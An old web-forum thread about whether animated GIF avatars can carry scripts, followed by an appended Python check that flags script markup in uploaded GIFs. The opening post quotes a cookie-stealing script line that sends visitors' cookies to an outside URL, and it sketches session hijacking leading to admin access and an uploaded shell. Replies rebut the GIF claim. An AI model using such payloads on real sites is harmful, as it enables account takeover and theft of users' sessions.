Author Topic: animated gifs dangerous?  (Read 2663 times)

Offline jbryant

  • Semi-Newbie
  • *
  • Posts: 69
animated gifs dangerous?
« on: January 17, 2007, 05:41:23 AM »
Is it true that allowing animated gifs in the signature or avatar is dangerous?

This was posted on my forum by one of my more experienced foreign users:


<"script>window.location('http://www.mysite/cookie.php?c=' + document.cookie)</script">

this is something that could be implemented into a gif pic or as swf flash animated thing ... this will steal the cookie of people who visit the page that the pic is in ...

if you don't know what a cookie is ... or how it is used to hack accounts ... try this


login to the forum
after you login
in the address bar (url bar) wipe everything and write
javascript:alert(document.cookie)

you will get a pop up window with stuff in it ...
one is SMF*** or something ...
if i got that for any user
i can use inline javascript to change my user to the user i got his cookie ...
that means his personal stuff will no longer be personal ... and if an admin visited the page with the gif or the swf ...

admin rights ... upload a shell ... all the site will go down .. and even the hosting company server that hosts the site ...

that's if the hacker was a smart one and wanted to do that

why do you think that scripts are not allowed in forums and stuff like that?

cause it's soooooooooo much danger.




How do I disable the gif in the signature if this is true?
Thank you in advance.
Check out our live cam community....WaynesvilleLive.com

Offline Dannii

  • SMF Friend
  • SMF Super Hero
  • *
  • Posts: 10,211
  • Mind the volcano!
Re: animated gifs dangerous?
« Reply #1 on: January 17, 2007, 05:56:01 AM »
Animated gifs aren't any more dangerous than any other type of image, and I'm pretty sure that the risk is extremely low. You can't embed a script in an image like that.
"Never imagine yourself not to be otherwise than what it might appear to others that what you were or might have been was not otherwise than what you had been would have appeared to them to be otherwise."

Offline Daniel15

  • SMF Friend
  • SMF Hero
  • *
  • Posts: 4,216
  • Gender: Male
  • http://dan.cx/
Re: animated gifs dangerous?
« Reply #2 on: January 17, 2007, 07:44:04 AM »
You can not embed a script in an image! An image is just that: An image. It can't contain anything else.

As far as I know, Flash itself can not read your cookies, it needs a separate JavaScript to do so (I could be wrong, though).

Quote
admin rights ... upload a shell ... all the site will go down .. and even the hosting company server that hosts the site ...

that's if the hacker was a smart one and wanted to do that
Sounds like a script kiddie to me :-\
Daniel15, former Customisation team member, resigned due to lack of time. I still love everyone here :D.
Go to smfshop.com for SMFshop support, do NOT email or PM me!

Offline webvision

  • Semi-Newbie
  • *
  • Posts: 63
Re: animated gifs dangerous?
« Reply #3 on: January 17, 2007, 08:48:51 AM »
I think animated or simple images are both equal.
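
Added example (not part of any post in this thread, and not SMF code): a server-side check, relevant to the question in the first post, that an uploaded avatar is structurally a GIF and carries no HTML or script markup. The function name, the size limit and the sample bytes are constructed for illustration.

```python
import re
import struct

# Markup that has no place in image bytes; matched case-insensitively.
MARKUP = re.compile(rb"<\s*(script|html|iframe|svg)\b|javascript:", re.I)


def check_gif_upload(data, max_side=1024):
    """Return a list of reasons to reject an upload; an empty list means accept."""
    if data[:6] not in (b"GIF87a", b"GIF89a"):
        return ["not a GIF: bad signature"]
    if len(data) < 13:
        return ["truncated: no logical screen descriptor"]
    problems = []
    # Logical screen descriptor: little-endian 16-bit width and height.
    width, height = struct.unpack("<HH", data[6:10])
    if not (0 < width <= max_side and 0 < height <= max_side):
        problems.append(f"implausible dimensions {width}x{height}")
    if not data.rstrip(b"\x00").endswith(b";"):
        problems.append("missing GIF trailer byte 0x3B")
    hit = MARKUP.search(data)
    if hit:
        problems.append(f"HTML/script markup at offset {hit.start()}")
    return problems


# Constructed sample: a minimal 1x1 GIF89a (header, two-colour table,
# one image descriptor, one LZW data block, trailer).
CLEAN = (
    b"GIF89a" + struct.pack("<HH", 1, 1) + b"\x80\x00\x00"
    + b"\x00\x00\x00\xff\xff\xff"
    + b"\x2c" + struct.pack("<HHHH", 0, 0, 1, 1) + b"\x00"
    + b"\x02\x02\x4c\x01\x00" + b";"
)
# Constructed sample: the same bytes with inert markup text spliced in.
TAINTED = CLEAN[:-1] + b"<script>/* constructed */</script>" + b";"
# Constructed sample: an HTML document renamed to .gif.
RENAMED = b"<html><body>constructed</body></html>"

if __name__ == "__main__":
    for name, blob in (("clean", CLEAN), ("tainted", TAINTED), ("renamed", RENAMED)):
        print(name, check_gif_upload(blob) or "accepted")
```

Pattern matching like this is a coarse filter; re-encoding the upload with an image library and serving it with an image Content-Type is the stronger control.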